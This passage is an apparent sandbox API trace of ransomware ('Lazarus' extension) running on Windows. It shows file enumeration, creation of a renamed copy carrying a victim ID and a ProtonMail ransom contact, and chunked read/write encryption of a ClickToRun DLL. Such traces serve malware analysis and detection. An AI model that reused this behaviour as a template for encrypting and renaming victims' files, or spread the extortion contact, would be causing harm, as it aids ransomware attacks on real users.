dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0089.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0089.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0089.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0089.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0089.872] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.872] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.872] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0, dwReserved0=0x1, dwReserved1=0x202f8, cFileName="api-ms-win-crt-heap-l1-1-0.dll", cAlternateFileName="AP23C9~1.DLL")) returned 1 [0089.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0089.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69490 [0089.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0089.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0089.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0089.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0089.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0089.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0089.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69490 | out: hHeap=0x20000) returned 1 [0089.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0089.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0089.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0089.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0089.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0089.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0089.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0089.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0089.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0089.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0089.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0089.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x55f20 [0089.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0089.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0089.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x4ebc8 [0089.872] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.872] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.872] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.872] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.872] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0089.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0089.873] AreFileApisANSI () returned 1 [0089.873] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 89 [0089.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0089.873] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.873] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0089.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0089.873] AreFileApisANSI () returned 1 [0089.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0089.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x4ebc8 [0089.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll") returned 89 [0089.873] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0089.873] GetFileType (hFile=0x418) returned 0x1 [0089.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0089.873] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0089.874] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0089.874] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0089.874] CloseHandle (hObject=0x418) returned 1 [0089.874] AreFileApisANSI () returned 1 [0089.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0089.874] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x4ebc8 [0089.874] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll") returned 89 [0089.874] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0089.874] GetFileType (hFile=0x418) returned 0x1 [0089.874] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0089.874] CloseHandle (hObject=0x418) returned 1 [0089.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0089.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0089.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0089.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0089.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0089.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0089.875] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0089.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0089.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0089.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0089.875] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0089.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0089.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0089.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0089.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0089.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0089.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0089.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0089.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0089.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0089.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0089.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0089.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0089.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0089.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0089.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0089.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0089.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0089.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0089.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0089.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0089.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0089.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0089.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0089.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0089.876] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0089.876] AreFileApisANSI () returned 1 [0089.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0089.876] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x4ebc8 [0089.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll") returned 89 [0089.876] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0)) returned 1 [0089.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0089.877] AreFileApisANSI () returned 1 [0089.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0089.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0089.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0089.877] GetLastError () returned 0x0 [0089.877] SetLastError (dwErrCode=0x0) [0089.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e180 [0089.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x4f220 [0089.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c058 [0089.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0089.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0089.877] GetLastError () returned 0x0 [0089.877] SetLastError (dwErrCode=0x0) [0089.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0089.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0089.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8f) returned 0x8a8c0 [0089.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0089.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x4ebc8 [0089.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0089.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0089.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0089.877] AreFileApisANSI () returned 1 [0089.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ebc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 151 [0089.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x12e) returned 0x4e568 [0089.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ebc8, cbMultiByte=-1, lpWideCharStr=0x4e568, cchWideChar=151 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 151 [0089.878] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0089.878] GetFileType (hFile=0x418) returned 0x1 [0089.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e568 | out: hHeap=0x20000) returned 1 [0089.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0089.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0089.879] AreFileApisANSI () returned 1 [0089.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0089.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x55f20 [0089.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll") returned 89 [0089.879] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0089.879] GetFileType (hFile=0x360) returned 0x1 [0089.879] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0089.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a9b0 [0089.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0089.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0089.879] GetLastError () returned 0x0 [0089.879] SetLastError (dwErrCode=0x0) [0089.879] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0089.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0089.879] GetLastError () returned 0x0 [0089.879] SetLastError (dwErrCode=0x0) [0089.879] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0089.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0089.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0089.879] ReadFile (in: hFile=0x360, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0089.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0089.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d750 [0089.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0089.882] GetLastError () returned 0x0 [0089.882] SetLastError (dwErrCode=0x0) [0089.882] GetLastError () returned 0x0 [0089.882] SetLastError (dwErrCode=0x0) [0089.882] GetLastError () returned 0x0 [0089.882] SetLastError (dwErrCode=0x0) [0089.882] GetLastError () returned 0x0 [0089.882] SetLastError (dwErrCode=0x0) [0089.882] ReadFile (in: hFile=0x360, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0089.882] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0089.887] GetLastError () returned 0x0 [0089.887] SetLastError (dwErrCode=0x0) [0089.887] GetLastError () returned 0x0 [0089.887] SetLastError (dwErrCode=0x0) [0089.887] GetLastError () returned 0x0 [0089.887] SetLastError (dwErrCode=0x0) [0089.887] GetLastError () returned 0x0 [0089.887] SetLastError (dwErrCode=0x0) [0089.887] ReadFile (in: hFile=0x360, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0089.888] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0089.888] GetLastError () returned 0x0 [0089.888] SetLastError (dwErrCode=0x0) [0089.888] GetLastError () returned 0x0 [0089.888] SetLastError (dwErrCode=0x0) [0089.888] GetLastError () returned 0x0 [0089.888] SetLastError (dwErrCode=0x0) [0089.888] GetLastError () returned 0x0 [0089.888] SetLastError (dwErrCode=0x0) [0089.888] ReadFile (in: hFile=0x360, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0089.889] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0089.889] GetLastError () returned 0x0 [0089.889] SetLastError (dwErrCode=0x0) [0089.889] GetLastError () returned 0x0 [0089.889] SetLastError (dwErrCode=0x0) [0089.889] GetLastError () returned 0x0 [0089.889] SetLastError (dwErrCode=0x0) [0089.889] GetLastError () returned 0x0 [0089.889] SetLastError (dwErrCode=0x0) [0089.889] ReadFile (in: hFile=0x360, lpBuffer=0x8f448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8f448*, lpNumberOfBytesRead=0x327f0c4*=0xcc0, lpOverlapped=0x0) returned 1 [0089.889] WriteFile (in: hFile=0x418, lpBuffer=0x90450*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0089.890] GetLastError () returned 0x0 [0089.890] SetLastError (dwErrCode=0x0) [0089.890] GetLastError () returned 0x0 [0089.890] SetLastError (dwErrCode=0x0) [0089.890] GetLastError () returned 0x0 [0089.890] SetLastError (dwErrCode=0x0) [0089.890] 